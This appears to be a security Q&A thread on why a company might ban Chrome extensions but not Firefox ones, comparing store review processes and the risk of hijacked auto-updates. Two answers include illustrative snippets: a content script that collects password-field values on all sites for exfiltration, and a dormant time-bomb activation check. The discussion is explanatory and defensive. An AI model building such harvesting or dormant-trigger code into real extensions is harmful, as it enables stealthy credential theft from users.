Are there objective reasons to not allow Google Chrome extensions, but to allow Firefox extensions?

I cannot answer the question as asked, but I hope this sheds some light on your problem.

  • Should corporate security rules forbid the usage of some browser extensions?

    IMHO the answer is YES here. Browser extensions can do almost anything on behalf of the browser itself, which means a local firewall will not detect them.

  • Are there objective reasons to trust XXX (put whatever browser or browser extension here) more than YYY (another browser or browser extension)?

    Well, in IT security, trust is based on two major pillars: code audit and reputation. The former is objective, while the latter is not, but I must admit that I mainly use the latter, because I have neither enough time nor enough knowledge to review everything, so I just rely on external advice from sources that I trust. When I rely on HTTPS to secure a channel, I must trust the certificate owner not to do bad things with the data once it has been received, and I must trust the certificate signer. Long story short, it may be possible to say whether one extension has a better reputation than another, but only extension by extension, not globally by browser.

  • Is the usage of a portable Firefox an acceptable solution in your use case?

    Still my opinion, but unless you are in a hierarchical position that allows you to ignore a rule from the security team, I want to say a big NO here. My advice is that you should first make a list of the extensions you commonly use, along with possible replacements. Then you should gather as many elements as you can on their objective security and on their reputation (still from a security point of view). Then you should tell your manager that the recent ban on Chrome extensions leads to a net decrease in productivity, and ask them to propose to the security team a list of the extensions you need, with possible replacements (a Firefox extension in place of a Chrome one, for example). Then either they agree on an acceptable list, or the question should climb higher in the organizational hierarchy, until someone who is accountable for both global security and global productivity takes a decision. Silently ignoring corporate rules is always a bad decision, because the person with global authority has no way to know that some rules are not being followed.

And whether your boss decides that security is more important than productivity or the opposite, they have the authority to make that choice, while you may not.


I suspect that Anders is right, and whoever set up the Chrome extension ban just didn't think about Firefox. If they realized that you were using Firefox to get around the ban, they'd probably forbid that too (or try to, anyway).

FWIW, yes, browser extensions can be problematic from a security viewpoint, and I can see reasons for banning or heavily restricting them in some situations. That said, being able to install your own software, including a different browser, is just as problematic for the same reasons, or more so, so allowing that while banning extensions does seem inconsistent.

In any case, the real problem here seems to be the lack of communication. If the extension ban was based on an existing official policy, all employees should have been made aware of the policy; if not, such a policy should have been created and properly announced.


All that said, as the author of a Chrome / Firefox extension (SOUP), let me note that there is, or at least used to be, a real difference in the security review process between Chrome Web Store and Firefox Add-ons. Basically, the difference is that Firefox Add-ons used to have a mandatory manual security review process that all extensions had to pass before being approved, whereas Chrome Web Store only flags extensions for manual review if they fail an automated heuristic check.

My personal experience with submitting my extension to Firefox Add-ons and the Chrome Web Store was more or less as follows:

  • Firefox Add-ons: I signed up for a developer account and submitted the extension. Two weeks later I received an e-mail saying that my extension (which, admittedly, had already grown quite large at that point) had been fully reviewed and approved. The reviewer had clearly gone over the code in detail, since they had spotted a nontrivial HTML sanitization bug (among just under 2,000 lines of pretty dense JavaScript) that could have led to an XSS vulnerability if, as they also noted in their review, the input hadn't come from a trusted source. Subsequent updates of the extension have generally been approved within a few days at most.

  • Chrome Web Store: To be able to submit an extension, I had to pay a $5 registration fee. This actually ended up taking me a while, since my bank was apparently flagging the charge as potentially fraudulent and refusing to let it through. Eventually I managed to sort it out by calling my bank and having them manually allow the charge. After completing the registration process, I submitted the extension and it was (IIRC) almost immediately published, apparently having passed the automated checks.

Of course, without knowing exactly what Google's automated checks are checking for, I cannot tell for sure how good they are at catching bugs and malware. But I do know that they failed to spot the almost-XSS bug in my own extension that Mozilla's reviewer caught.

More generally, my impression is that Google is more focused on trying to make extension authors traceable and accountable (via the registration fee, which at least means they know my credit card details; although I'm sure a malicious actor could find ways around that) and on detecting deliberate malware. And they don't always seem to catch it, either. The former Firefox Add-ons review process, on the other hand, not only kept out malware but also actually tried to spot potential security holes even in well-intentioned extensions. And by manually reviewing updates to existing extensions, the Firefox Add-ons system would also thwart developer account hijacking attacks like those that have compromised several legitimate Chrome extensions recently.


Unfortunately, as Makyen pointed out in the comments below, this difference no longer exists: as of a few months ago, Firefox Add-ons has moved to a semi-automated extension review process, just like the one Chrome Web Store is using.

In the linked blog post, the change is motivated by "the new WebExtensions API [being] less likely to cause security or stability problems for users." Unfortunately, that reasoning does not really convince me: WebExtensions, even pure content script extensions like SOUP, can do plenty of damage in the hands of a malicious actor.

The content script API alone basically gives an extension free access to every web page you visit and every password or credit card number that you type in. Sure, when you install the extension, you'll be told which sites it may run content scripts on, but so many extensions (including ad blockers, privacy extensions, etc.) already require the ability to inject scripts on every site that few users will pay any attention to that warning, even if they understand what it means.
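To make that concrete, here is a minimal sketch of the kind of harvesting a broadly-permissioned content script could do. The manifest keys (`matches`, `js`) are standard WebExtensions fields, but the extension, file names, and the `collectValues` helper are invented for illustration:

```javascript
// Pure helper: pull the values out of a list of input elements.
// Separated out so the logic is visible without a real DOM.
function collectValues(inputs) {
  return inputs.map(input => input.value);
}

// In a real (malicious) extension, manifest.json would request
// injection into every site:
//   "content_scripts": [{ "matches": ["<all_urls>"], "js": ["grab.js"] }]
//
// and grab.js could then hook form submissions on any page:
//
//   document.addEventListener("submit", () => {
//     const stolen = collectValues(
//       [...document.querySelectorAll("input[type=password]")]);
//     // ...ship `stolen` off to a remote server, e.g. via fetch()...
//   }, true);
```

The point is that nothing in the content script API distinguishes this from a legitimate ad blocker or password manager: both ask for exactly the same "access your data for all websites" permission.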

Just a week after the announcement linked above, two extensions with embedded bitcoin miners were spotted on Firefox Add-ons. So it seems that, when it comes to extensions, Firefox's former security advantage over Chrome is now just nostalgia. :(


Yes.

There can be a legitimate reason:

  • Chrome extensions are always automatically updated.
  • Firefox extensions are not required to be auto-updated.

This means that if the account of the developer of any Chrome extension with the "read your information on all websites" permission gets compromised, the thief can push malicious code out around the world very quickly,1 putting all sorts of accounts at risk, from email to banking. Allowing the user to update at a slower and less predictable pace makes it (1) more likely that the malicious code will have been spotted and removed by the time the update happens, and (2) less likely that the attack is attempted in the first place, precisely because of (1).

Now, I have no idea if this is your company's reason. In my experience, people (and even Google, it seems) tend to forget about this threat of developer compromise, or brush it under the rug, which in my opinion is dangerously wrong. However, it is a legitimate concern, and I believe it is only a matter of time before dangerous malware spreads globally via forced auto-update.

1 Don't be too naive in how you think about this. If you're thinking "but they run automated tests" or "but they stagger the updates" or whatever, realize that malicious code need not show signs of malicious activity immediately, especially not network activity. It can simply lie dormant while the update is being pushed out, activate at some preset later time, and, after that simultaneous global activation, send credentials from a huge number of users and websites back to its mother ship before it is caught and disabled.
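The dormancy trick described in the footnote can be sketched in a few lines. The activation date and the `shouldActivate` function are made up for illustration; the point is only how trivially a payload can sit silent through review and staggered rollout:

```javascript
// Hypothetical "time bomb" gate: the update ships with an activation
// timestamp in the future, so any automated or manual check performed
// at publication time observes no suspicious behaviour at all.
const ACTIVATE_AFTER = Date.parse("2030-01-01T00:00:00Z"); // made-up date

function shouldActivate(nowMs) {
  // Lies dormant until the chosen moment, then flips on everywhere
  // at once for every user whose browser has already auto-updated.
  return nowMs >= ACTIVATE_AFTER;
}
```

A reviewer running the extension today sees nothing; every auto-updated install worldwide turns hostile at the same instant, long after review.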